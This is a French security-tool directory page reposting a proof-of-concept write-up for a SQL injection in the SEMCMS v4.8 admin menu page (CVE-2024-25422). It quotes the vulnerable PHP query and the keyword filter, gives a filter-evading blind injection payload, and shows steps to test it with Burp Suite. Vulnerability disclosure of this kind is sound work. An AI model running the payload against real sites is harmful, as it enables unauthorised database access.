Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
semcms — semcms存在SQL注入(CVE-2024-25422 ) | Kitploit
Outils/GitHubGitHub/tzyyyyyyy/semcms
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubtzyyyyyyy/semcms

semcms

semcms存在SQL注入(CVE-2024-25422 )

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Introduction à Semcms

SEMCMS est un système de gestion de contenu (CMS) pour sites web de commerce extérieur qui supporte plusieurs langues.

root@kitploit:~
v4.8 Download Link: http://www.sem-cms.com/TradeCmsdown/php/semcms_php_4.8.zip

Causes des vulnérabilités :

/xcR45q_Admin/SEMCMS_Menu.php Ligne 66

Code de vulnérabilité :

root@kitploit:~
<?php
 } elseif ($type == "edit") {
 
   $row = mysqli_fetch_array($db_conn->query("SELECT * FROM sc_menu WHERE ID=" . $_GET["ID"]));
 
   ?>

On peut voir que l'ID ici exécutera une instruction SQL lors du passage de paramètres via GET

Code de filtrage dans /Include/contorl.php

Ligne 151

root@kitploit:~
function test_input($data) { 
    //$data = str_replace("%", "percent", $data);
    $data = trim($data);
    $data = stripslashes($data);
    $data = htmlspecialchars($data,*ENT_QUOTES*);
    return $data;
  }

Et la 8ème ligne

root@kitploit:~
function inject_check_sql($sql_str) {
 
   return preg_match('/select|and|insert|=|%|<|between|update|\'|\*|union|into|load_file|outfile/i',$sql_str); 
 } 
 function verify_str($str) { 
    if(inject_check_sql($str)) {
      exit('Sorry,You do this is wrong! (.-.)');
     } 
   return $str;
 } 

En filtrant le contenu ci-dessus, nous pouvons construire un payload

root@kitploit:~
-1%20or%20length(database())%20REGEXP%20char(94,53,36)

Récurrence des vulnérabilités

visiter un site web

root@kitploit:~
http://url/xcR45q_Admin/SEMCMS_Menu.php

Capture de paquets avec Brupsuite, étant donné que la longueur du nom de la base de données est de 5 lors de la création d'un nouveau site, le payload est construit comme suit

root@kitploit:~
-1%20or%20length(database())%20REGEXP%20char(94,53,36)

(Déterminer si la longueur du nom de la base de données est de 5)

Insérer le payload pour voir l'echo

clip_image002

Changer le payload à ce moment

root@kitploit:~
-1%20or%20length(database())%20REGEXP%20char(94,54,36)

(Déterminer si la longueur du nom de la base de données est de 6)

Changer le payload à ce moment

clip_image004

L'injection SQL peut continuer en fonction des changements de la page à l'avenir

Télécharger l’outil